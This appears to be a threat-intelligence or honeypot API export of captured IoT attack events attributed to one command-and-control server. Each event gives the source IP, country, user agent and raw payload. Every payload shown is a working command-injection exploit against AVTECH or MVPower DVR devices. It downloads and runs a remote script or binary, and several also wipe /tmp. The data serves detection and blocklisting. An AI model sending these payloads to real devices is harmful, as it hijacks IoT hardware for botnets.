DDoS malware C2 185.172.111.214

1. {
2.   "count": 484,
3.   "next": null,
4.   "previous": null,
5.   "results": [
6.     {
7.       "event_id": "e8412ee87acd3645938b12cc8f93cea0e3f4e180563b1d7598eaf3691ab550ec",
8.       "source_ip_address": "189.225.157.16",
9.       "country": "MX",
10.       "user_agent": "Hello, World",
11.       "payload": "POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget http://185.172.111.214/8UsA.sh -O jno; sh jno $ HTTP/1.1",
12.       "post_data": "",
13.       "target_port": 88,
14.       "protocol": "tcp",
15.       "tags": [
16.         {
17.           "cve": "",
18.           "category": "IoT",
19.           "description": "AVTECH Exploit"
20.         }
21.       ],
22.       "event_count": 2,
23.       "first_seen": "2020-06-17T01:18:25Z",
24.       "last_seen": "2020-06-17T07:57:16Z"
25.     },
26.     {
27.       "event_id": "fc8d87f3252fe585bcf2c693acfe988de9385acbb9579c687478bf68ebe1890b",
28.       "source_ip_address": "202.160.39.194",
29.       "country": "BN",
30.       "user_agent": "Hello, world",
31.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
32.       "post_data": "",
33.       "target_port": 80,
34.       "protocol": "tcp",
35.       "tags": [
36.         {
37.           "cve": "",
38.           "category": "IoT",
39.           "description": "MVPower DVR (JAWS Web Server) RCE"
40.         }
41.       ],
42.       "event_count": 4,
43.       "first_seen": "2020-06-06T02:38:29Z",
44.       "last_seen": "2020-06-17T04:18:23Z"
45.     },
46.     {
47.       "event_id": "208e11fa6f6597b589920439f1da12ae8d93a0067119419f9ff3c929bfccf199",
48.       "source_ip_address": "68.150.109.112",
49.       "country": "CA",
50.       "user_agent": "Hello, world",
51.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
52.       "post_data": "",
53.       "target_port": 80,
54.       "protocol": "tcp",
55.       "tags": [
56.         {
57.           "cve": "",
58.           "category": "IoT",
59.           "description": "MVPower DVR (JAWS Web Server) RCE"
60.         }
61.       ],
62.       "event_count": 2,
63.       "first_seen": "2020-06-14T16:18:54Z",
64.       "last_seen": "2020-06-16T18:56:49Z"
65.     },
66.     {
67.       "event_id": "d9d60a3f37ce8e0151bdaddf284ea1f168f8abdaf9fcb2eec5391b32b0503f49",
68.       "source_ip_address": "14.207.113.218",
69.       "country": "TH",
70.       "user_agent": "Hello, World",
71.       "payload": "POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget http://185.172.111.214/8UsA.sh -O jno; sh jno $ HTTP/1.1",
72.       "post_data": "",
73.       "target_port": 88,
74.       "protocol": "tcp",
75.       "tags": [
76.         {
77.           "cve": "",
78.           "category": "IoT",
79.           "description": "AVTECH Exploit"
80.         }
81.       ],
82.       "event_count": 1,
83.       "first_seen": "2020-06-16T15:38:14Z",
84.       "last_seen": "2020-06-16T15:38:14Z"
85.     },
86.     {
87.       "event_id": "e40a253f029fc8e65fd7169e0a6b4b52a3673a7845ba889da12d4b6b9dc0a1a3",
88.       "source_ip_address": "119.82.97.219",
89.       "country": "IN",
90.       "user_agent": "Hello, world",
91.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
92.       "post_data": "",
93.       "target_port": 80,
94.       "protocol": "tcp",
95.       "tags": [
96.         {
97.           "cve": "",
98.           "category": "IoT",
99.           "description": "MVPower DVR (JAWS Web Server) RCE"
100.         }
101.       ],
102.       "event_count": 6,
103.       "first_seen": "2020-06-05T01:29:15Z",
104.       "last_seen": "2020-06-16T00:27:27Z"
105.     },
106.     {
107.       "event_id": "656c2549ab797cc42bfd30bb21fdc430185a80c1a2e7edda9d908bcc1d21e44f",
108.       "source_ip_address": "58.69.58.87",
109.       "country": "PH",
110.       "user_agent": "Hello, world",
111.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
112.       "post_data": "",
113.       "target_port": 80,
114.       "protocol": "tcp",
115.       "tags": [
116.         {
117.           "cve": "",
118.           "category": "IoT",
119.           "description": "MVPower DVR (JAWS Web Server) RCE"
120.         }
121.       ],
122.       "event_count": 3,
123.       "first_seen": "2020-06-06T05:20:24Z",
124.       "last_seen": "2020-06-15T19:44:47Z"
125.     },
126.     {
127.       "event_id": "a757fdcfa6d4191a558836a4c252b2fed6e7189f65c4101ff1bc63bedd367be7",
128.       "source_ip_address": "116.108.218.74",
129.       "country": "VN",
130.       "user_agent": "Hello, World",
131.       "payload": "POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget http://185.172.111.214/8UsA.sh -O jno; sh jno $ HTTP/1.1",
132.       "post_data": "",
133.       "target_port": 88,
134.       "protocol": "tcp",
135.       "tags": [
136.         {
137.           "cve": "",
138.           "category": "IoT",
139.           "description": "AVTECH Exploit"
140.         }
141.       ],
142.       "event_count": 1,
143.       "first_seen": "2020-06-15T10:40:17Z",
144.       "last_seen": "2020-06-15T10:40:17Z"
145.     },
146.     {
147.       "event_id": "24c81fdd645833bd4c8be5dbb8a69b6e01a1e4bab9166facf5fe0a9e1f038773",
148.       "source_ip_address": "116.87.119.73",
149.       "country": "SG",
150.       "user_agent": "Hello, world",
151.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
152.       "post_data": "",
153.       "target_port": 80,
154.       "protocol": "tcp",
155.       "tags": [
156.         {
157.           "cve": "",
158.           "category": "IoT",
159.           "description": "MVPower DVR (JAWS Web Server) RCE"
160.         }
161.       ],
162.       "event_count": 4,
163.       "first_seen": "2020-06-11T09:45:33Z",
164.       "last_seen": "2020-06-13T23:21:42Z"
165.     },
166.     {
167.       "event_id": "2e7cd3e10229f5932a7c63a9bf88769c700b37420c0d78ef4b238961eb2a7a80",
168.       "source_ip_address": "200.39.231.55",
169.       "country": "MX",
170.       "user_agent": "Hello, world",
171.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
172.       "post_data": "",
173.       "target_port": 80,
174.       "protocol": "tcp",
175.       "tags": [
176.         {
177.           "cve": "",
178.           "category": "IoT",
179.           "description": "MVPower DVR (JAWS Web Server) RCE"
180.         }
181.       ],
182.       "event_count": 3,
183.       "first_seen": "2020-06-04T22:11:28Z",
184.       "last_seen": "2020-06-13T12:47:13Z"
185.     },
186.     {
187.       "event_id": "198e9f94933adbdf9a2318776ce8c4947641e3d02d21c1f70c85ec99b68c4f4b",
188.       "source_ip_address": "114.141.54.106",
189.       "country": "ID",
190.       "user_agent": "Hello, world",
191.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
192.       "post_data": "",
193.       "target_port": 80,
194.       "protocol": "tcp",
195.       "tags": [
196.         {
197.           "cve": "",
198.           "category": "IoT",
199.           "description": "MVPower DVR (JAWS Web Server) RCE"
200.         }
201.       ],
202.       "event_count": 2,
203.       "first_seen": "2020-06-02T07:05:27Z",
204.       "last_seen": "2020-06-13T04:59:52Z"
205.     },
206.     {
207.       "event_id": "ada9949c210f7a040cb67413d29da55c8675e84ad40ebcb3bbeefb37a04c97b7",
208.       "source_ip_address": "77.235.145.202",
209.       "country": "LB",
210.       "user_agent": "Hello, world",
211.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
212.       "post_data": "",
213.       "target_port": 80,
214.       "protocol": "tcp",
215.       "tags": [
216.         {
217.           "cve": "",
218.           "category": "IoT",
219.           "description": "MVPower DVR (JAWS Web Server) RCE"
220.         }
221.       ],
222.       "event_count": 2,
223.       "first_seen": "2020-06-08T02:08:53Z",
224.       "last_seen": "2020-06-12T17:30:41Z"
225.     },
226.     {
227.       "event_id": "c9fc75903d02ad1dbbc076e18411a69bb4b680b906a2d7312922d2945fffe548",
228.       "source_ip_address": "96.75.231.194",
229.       "country": "US",
230.       "user_agent": "Hello, world",
231.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
232.       "post_data": "",
233.       "target_port": 80,
234.       "protocol": "tcp",
235.       "tags": [
236.         {
237.           "cve": "",
238.           "category": "IoT",
239.           "description": "MVPower DVR (JAWS Web Server) RCE"
240.         }
241.       ],
242.       "event_count": 1,
243.       "first_seen": "2020-06-11T22:09:28Z",
244.       "last_seen": "2020-06-11T22:09:28Z"
245.     },
246.     {
247.       "event_id": "3f29f297982bcd099ba1a14efd9a873c892e965f2ed1904f608fed0c55b3e077",
248.       "source_ip_address": "82.255.38.238",
249.       "country": "FR",
250.       "user_agent": "Hello, World",
251.       "payload": "POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget http://185.172.111.214/8UsA.sh -O jno; sh jno $ HTTP/1.1",
252.       "post_data": "",
253.       "target_port": 88,
254.       "protocol": "tcp",
255.       "tags": [
256.         {
257.           "cve": "",
258.           "category": "IoT",
259.           "description": "AVTECH Exploit"
260.         }
261.       ],
262.       "event_count": 1,
263.       "first_seen": "2020-06-11T16:53:31Z",
264.       "last_seen": "2020-06-11T16:53:31Z"
265.     },
266.     {
267.       "event_id": "7bc5d7c1e2e20809fa6dd0f9e2301c94dac9a46c5045ac15433a2800401ab3ff",
268.       "source_ip_address": "58.182.23.33",
269.       "country": "SG",
270.       "user_agent": "Hello, world",
271.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
272.       "post_data": "",
273.       "target_port": 80,
274.       "protocol": "tcp",
275.       "tags": [
276.         {
277.           "cve": "",
278.           "category": "IoT",
279.           "description": "MVPower DVR (JAWS Web Server) RCE"
280.         }
281.       ],
282.       "event_count": 4,
283.       "first_seen": "2020-06-01T09:51:25Z",
284.       "last_seen": "2020-06-11T00:46:56Z"
285.     },
286.     {
287.       "event_id": "2d812c6a9c6cd68bc82bfa7f4068090d0ce31a70ceb2487f589a1bb8b9813930",
288.       "source_ip_address": "203.210.157.13",
289.       "country": "VN",
290.       "user_agent": "Hello, world",
291.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
292.       "post_data": "",
293.       "target_port": 80,
294.       "protocol": "tcp",
295.       "tags": [
296.         {
297.           "cve": "",
298.           "category": "IoT",
299.           "description": "MVPower DVR (JAWS Web Server) RCE"
300.         }
301.       ],
302.       "event_count": 1,
303.       "first_seen": "2020-06-10T05:07:24Z",
304.       "last_seen": "2020-06-10T05:07:24Z"
305.     },
306.     {
307.       "event_id": "61ccde5876ffd40e422aa34815858747a32f2dde9a85191959f9bc2a8b82f082",
308.       "source_ip_address": "5.34.149.225",
309.       "country": "ES",
310.       "user_agent": "Hello, world",
311.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
312.       "post_data": "",
313.       "target_port": 80,
314.       "protocol": "tcp",
315.       "tags": [
316.         {
317.           "cve": "",
318.           "category": "IoT",
319.           "description": "MVPower DVR (JAWS Web Server) RCE"
320.         }
321.       ],
322.       "event_count": 4,
323.       "first_seen": "2020-06-03T22:10:35Z",
324.       "last_seen": "2020-06-09T22:12:42Z"
325.     },
326.     {
327.       "event_id": "eb77cfe6e912c19f63a058ae3e72e2f48028e01c5c502e2f9907c930c5dd88f8",
328.       "source_ip_address": "185.173.60.5",
329.       "country": "LB",
330.       "user_agent": "Hello, world",
331.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
332.       "post_data": "",
333.       "target_port": 80,
334.       "protocol": "tcp",
335.       "tags": [
336.         {
337.           "cve": "",
338.           "category": "IoT",
339.           "description": "MVPower DVR (JAWS Web Server) RCE"
340.         }
341.       ],
342.       "event_count": 3,
343.       "first_seen": "2020-06-04T17:51:47Z",
344.       "last_seen": "2020-06-09T21:43:21Z"
345.     },
346.     {
347.       "event_id": "2992e4ba9c8eb55324037ba2cdbe629fc464116d3b90284b7766ec530b4588da",
348.       "source_ip_address": "160.120.131.129",
349.       "country": "CI",
350.       "user_agent": "Hello, world",
351.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
352.       "post_data": "",
353.       "target_port": 80,
354.       "protocol": "tcp",
355.       "tags": [
356.         {
357.           "cve": "",
358.           "category": "IoT",
359.           "description": "MVPower DVR (JAWS Web Server) RCE"
360.         }
361.       ],
362.       "event_count": 1,
363.       "first_seen": "2020-06-09T19:15:55Z",
364.       "last_seen": "2020-06-09T19:15:55Z"
365.     },
366.     {
367.       "event_id": "1a7ca8003d5415d867b2c30caeda45c14e991f510f2c5a174ac43808258be4fb",
368.       "source_ip_address": "101.128.74.27",
369.       "country": "ID",
370.       "user_agent": "Hello, world",
371.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
372.       "post_data": "",
373.       "target_port": 80,
374.       "protocol": "tcp",
375.       "tags": [
376.         {
377.           "cve": "",
378.           "category": "IoT",
379.           "description": "MVPower DVR (JAWS Web Server) RCE"
380.         }
381.       ],
382.       "event_count": 3,
383.       "first_seen": "2020-06-02T06:36:04Z",
384.       "last_seen": "2020-06-09T15:58:08Z"
385.     },
386.     {
387.       "event_id": "6a4406dd171b23a0931c37c586d0227c2b8b58f4b3115b7e22a0df58ff39fbca",
388.       "source_ip_address": "110.232.80.209",
389.       "country": "ID",
390.       "user_agent": "Hello, world",
391.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
392.       "post_data": "",
393.       "target_port": 80,
394.       "protocol": "tcp",
395.       "tags": [
396.         {
397.           "cve": "",
398.           "category": "IoT",
399.           "description": "MVPower DVR (JAWS Web Server) RCE"
400.         }
401.       ],
402.       "event_count": 1,
403.       "first_seen": "2020-06-09T13:44:27Z",
404.       "last_seen": "2020-06-09T13:44:27Z"
405.     },
406.     {
407.       "event_id": "66c9f9a3d74d38230178a5f7e3574f3af0b87fa86918a32176e71dedb4cdacbe",
408.       "source_ip_address": "41.39.51.193",
409.       "country": "EG",
410.       "user_agent": "Hello, world",
411.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
412.       "post_data": "",
413.       "target_port": 80,
414.       "protocol": "tcp",
415.       "tags": [
416.         {
417.           "cve": "",
418.           "category": "IoT",
419.           "description": "MVPower DVR (JAWS Web Server) RCE"
420.         }
421.       ],
422.       "event_count": 1,
423.       "first_seen": "2020-06-08T23:50:57Z",
424.       "last_seen": "2020-06-08T23:50:57Z"
425.     },
426.     {
427.       "event_id": "413fe831241d5fff002d9979af144d8ea7fb089fea9917807dfa7d1a1c23c696",
428.       "source_ip_address": "81.28.86.193",
429.       "country": "NL",
430.       "user_agent": "Hello, world",
431.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
432.       "post_data": "",
433.       "target_port": 80,
434.       "protocol": "tcp",
435.       "tags": [
436.         {
437.           "cve": "",
438.           "category": "IoT",
439.           "description": "MVPower DVR (JAWS Web Server) RCE"
440.         }
441.       ],
442.       "event_count": 1,
443.       "first_seen": "2020-06-08T18:42:19Z",
444.       "last_seen": "2020-06-08T18:42:19Z"
445.     },
446.     {
447.       "event_id": "99b65fa4e14bded04e37dd98bc18196466178e2e0bbdd4de8dbf9e74f3886d3f",
448.       "source_ip_address": "24.138.226.129",
449.       "country": "PR",
450.       "user_agent": "Hello, world",
451.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
452.       "post_data": "",
453.       "target_port": 80,
454.       "protocol": "tcp",
455.       "tags": [
456.         {
457.           "cve": "",
458.           "category": "IoT",
459.           "description": "MVPower DVR (JAWS Web Server) RCE"
460.         }
461.       ],
462.       "event_count": 1,
463.       "first_seen": "2020-06-08T11:57:50Z",
464.       "last_seen": "2020-06-08T11:57:50Z"
465.     },
466.     {
467.       "event_id": "5ea380327aebe8cad8e627ff57bb3bc2260ad12f1842888465d98f23a2181961",
468.       "source_ip_address": "2.88.134.28",
469.       "country": "SA",
470.       "user_agent": "Hello, world",
471.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
472.       "post_data": "",
473.       "target_port": 80,
474.       "protocol": "tcp",
475.       "tags": [
476.         {
477.           "cve": "",
478.           "category": "IoT",
479.           "description": "MVPower DVR (JAWS Web Server) RCE"
480.         }
481.       ],
482.       "event_count": 2,
483.       "first_seen": "2020-06-07T01:28:35Z",
484.       "last_seen": "2020-06-08T10:58:22Z"
485.     },
486.     {
487.       "event_id": "48fac1a45c906ea9b167a41c7fe7d8dd53a147cdeae65a14c0918d943069374c",
488.       "source_ip_address": "41.73.3.190",
489.       "country": "NG",
490.       "user_agent": "Hello, world",
491.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
492.       "post_data": "",
493.       "target_port": 80,
494.       "protocol": "tcp",
495.       "tags": [
496.         {
497.           "cve": "",
498.           "category": "IoT",
499.           "description": "MVPower DVR (JAWS Web Server) RCE"
500.         }
501.       ],
502.       "event_count": 3,
503.       "first_seen": "2020-06-04T03:12:44Z",
504.       "last_seen": "2020-06-08T06:05:26Z"
505.     },
506.     {
507.       "event_id": "0d4386d6ddbe0a123fc81b29001472a8a4f882c40e2792a8233f245edd90cc73",
508.       "source_ip_address": "113.160.189.12",
509.       "country": "VN",
510.       "user_agent": "Hello, world",
511.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
512.       "post_data": "",
513.       "target_port": 80,
514.       "protocol": "tcp",
515.       "tags": [
516.         {
517.           "cve": "",
518.           "category": "IoT",
519.           "description": "MVPower DVR (JAWS Web Server) RCE"
520.         }
521.       ],
522.       "event_count": 2,
523.       "first_seen": "2020-06-03T08:35:59Z",
524.       "last_seen": "2020-06-07T00:19:49Z"
525.     },
526.     {
527.       "event_id": "ceefcf98d0a70c61aa0668cd9e8b705331ce32643007d7a1e8ea0e9563812a83",
528.       "source_ip_address": "71.205.133.151",
529.       "country": "US",
530.       "user_agent": "Hello, world",
531.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
532.       "post_data": "",
533.       "target_port": 80,
534.       "protocol": "tcp",
535.       "tags": [
536.         {
537.           "cve": "",
538.           "category": "IoT",
539.           "description": "MVPower DVR (JAWS Web Server) RCE"
540.         }
541.       ],
542.       "event_count": 2,
543.       "first_seen": "2020-06-02T22:55:55Z",
544.       "last_seen": "2020-06-06T10:57:13Z"
545.     },
546.     {
547.       "event_id": "107403196ee80c00bc7f393c5a53ec5506dc849b593ed42e6c7ca75034d555ed",
548.       "source_ip_address": "101.99.33.118",
549.       "country": "VN",
550.       "user_agent": "Hello, world",
551.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
552.       "post_data": "",
553.       "target_port": 80,
554.       "protocol": "tcp",
555.       "tags": [
556.         {
557.           "cve": "",
558.           "category": "IoT",
559.           "description": "MVPower DVR (JAWS Web Server) RCE"
560.         }
561.       ],
562.       "event_count": 1,
563.       "first_seen": "2020-06-05T14:53:19Z",
564.       "last_seen": "2020-06-05T14:53:19Z"
565.     },
566.     {
567.       "event_id": "3d048095774ac9bbc3f682b3162d858e7d82c9b7d49b6f9b66167287aed37050",
568.       "source_ip_address": "187.134.220.211",
569.       "country": "MX",
570.       "user_agent": "Hello, world",
571.       "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
572.       "post_data": "",
573.       "target_port": 80,
574.       "protocol": "tcp",
575.       "tags": [
576.         {
577.           "cve": "",
578.           "category": "IoT",
579.           "description": "MVPower DVR (JAWS Web Server) RCE"
580.         }
581.       ],
582.       "event_count": 1,
583.       "first_seen": "2020-06-05T06:59:14Z",
584.       "last_seen": "2020-06-05T06:59:14Z"
585.     },
586.     {
587.       "event_id": "915ca5a00a4ae06ff5e6bf2ad1453b463bc449e7afb519f112c6ddeef1bb73bf",
588.       "source_ip_address": "159.203.191.246",
589.       "country": "US",
590.       "user_agent": "Snickers-Avtech",
591.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh )&password=admin HTTP/1.1",
592.       "post_data": "",
593.       "target_port": 8139,
594.       "protocol": "tcp",
595.       "tags": [
596.         {
597.           "cve": "",
598.           "category": "IoT",
599.           "description": "AVTECH Exploit"
600.         }
601.       ],
602.       "event_count": 1,
603.       "first_seen": "2020-06-05T00:31:51Z",
604.       "last_seen": "2020-06-05T00:31:51Z"
605.     },
606.     {
607.       "event_id": "d276fb1901e3ef0975eefcbcd04362977e3844cdc2704eb21f954f67a58251e3",
608.       "source_ip_address": "159.203.191.246",
609.       "country": "US",
610.       "user_agent": "Snickers-Avtech",
611.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh )&password=admin HTTP/1.1",
612.       "post_data": "",
613.       "target_port": 8000,
614.       "protocol": "tcp",
615.       "tags": [
616.         {
617.           "cve": "",
618.           "category": "IoT",
619.           "description": "AVTECH Exploit"
620.         }
621.       ],
622.       "event_count": 1,
623.       "first_seen": "2020-06-05T00:31:51Z",
624.       "last_seen": "2020-06-05T00:31:51Z"
625.     },
626.     {
627.       "event_id": "3d82a6146e1eb4e0d98339fb0bb740c2594c29e6fd92b382224999bf1d627f54",
628.       "source_ip_address": "159.203.191.246",
629.       "country": "US",
630.       "user_agent": "Snickers-Avtech",
631.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh ; echo snickers_was_here HTTP/1.1",
632.       "post_data": "",
633.       "target_port": 9000,
634.       "protocol": "tcp",
635.       "tags": [
636.         {
637.           "cve": "",
638.           "category": "IoT",
639.           "description": "AVTECH Exploit"
640.         }
641.       ],
642.       "event_count": 1,
643.       "first_seen": "2020-06-05T00:31:49Z",
644.       "last_seen": "2020-06-05T00:31:49Z"
645.     },
646.     {
647.       "event_id": "cdeefa87f6fa4102219a66444877e08fad8461303a5c6324df692811fc56966a",
648.       "source_ip_address": "159.203.191.246",
649.       "country": "US",
650.       "user_agent": "Snickers-Avtech",
651.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh )&password=admin HTTP/1.1",
652.       "post_data": "",
653.       "target_port": 9000,
654.       "protocol": "tcp",
655.       "tags": [
656.         {
657.           "cve": "",
658.           "category": "IoT",
659.           "description": "AVTECH Exploit"
660.         }
661.       ],
662.       "event_count": 1,
663.       "first_seen": "2020-06-05T00:31:47Z",
664.       "last_seen": "2020-06-05T00:31:47Z"
665.     },
666.     {
667.       "event_id": "23e190350756e823a1bacefd80ef4628ce0b5630562ab626c733e9ccdf49c645",
668.       "source_ip_address": "159.203.191.246",
669.       "country": "US",
670.       "user_agent": "Snickers-Avtech",
671.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh ; echo snickers_was_here HTTP/1.1",
672.       "post_data": "",
673.       "target_port": 7001,
674.       "protocol": "tcp",
675.       "tags": [
676.         {
677.           "cve": "",
678.           "category": "IoT",
679.           "description": "AVTECH Exploit"
680.         }
681.       ],
682.       "event_count": 1,
683.       "first_seen": "2020-06-05T00:31:46Z",
684.       "last_seen": "2020-06-05T00:31:46Z"
685.     },
686.     {
687.       "event_id": "48ec965f424e5a972083a1acebe2045b7e2eef15438a34a59bda430760544b11",
688.       "source_ip_address": "159.203.191.246",
689.       "country": "US",
690.       "user_agent": "Snickers-Avtech",
691.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh ; echo snickers_was_here HTTP/1.1",
692.       "post_data": "",
693.       "target_port": 7547,
694.       "protocol": "tcp",
695.       "tags": [
696.         {
697.           "cve": "",
698.           "category": "IoT",
699.           "description": "AVTECH Exploit"
700.         }
701.       ],
702.       "event_count": 1,
703.       "first_seen": "2020-06-05T00:31:46Z",
704.       "last_seen": "2020-06-05T00:31:46Z"
705.     },
706.     {
707.       "event_id": "7697269d43c72270732d3bbf201cfc7a1e96df9032f8c341d3e0fa8294370bb7",
708.       "source_ip_address": "159.203.191.246",
709.       "country": "US",
710.       "user_agent": "Snickers-Avtech",
711.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh )&password=admin HTTP/1.1",
712.       "post_data": "",
713.       "target_port": 7001,
714.       "protocol": "tcp",
715.       "tags": [
716.         {
717.           "cve": "",
718.           "category": "IoT",
719.           "description": "AVTECH Exploit"
720.         }
721.       ],
722.       "event_count": 1,
723.       "first_seen": "2020-06-05T00:31:44Z",
724.       "last_seen": "2020-06-05T00:31:44Z"
725.     },
726.     {
727.       "event_id": "9b4406704bcbba0a3ff30679ff2a1a50bed736141c93e59d12db96d4fadf2fa8",
728.       "source_ip_address": "159.203.191.246",
729.       "country": "US",
730.       "user_agent": "Snickers-Avtech",
731.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 98.8UsA.sh; chmod 777 98.8UsA.sh; sh 98.8UsA.sh )&password=admin HTTP/1.1",
732.       "post_data": "",
733.       "target_port": 7547,
734.       "protocol": "tcp",
735.       "tags": [
736.         {
737.           "cve": "",
738.           "category": "IoT",
739.           "description": "AVTECH Exploit"
740.         }
741.       ],
742.       "event_count": 1,
743.       "first_seen": "2020-06-05T00:31:44Z",
744.       "last_seen": "2020-06-05T00:31:44Z"
745.     },
746.     {
747.       "event_id": "6bb75f7f2832e0f4145d10db25380c25d837340c40a4d957dcf1addfb2e5d4bd",
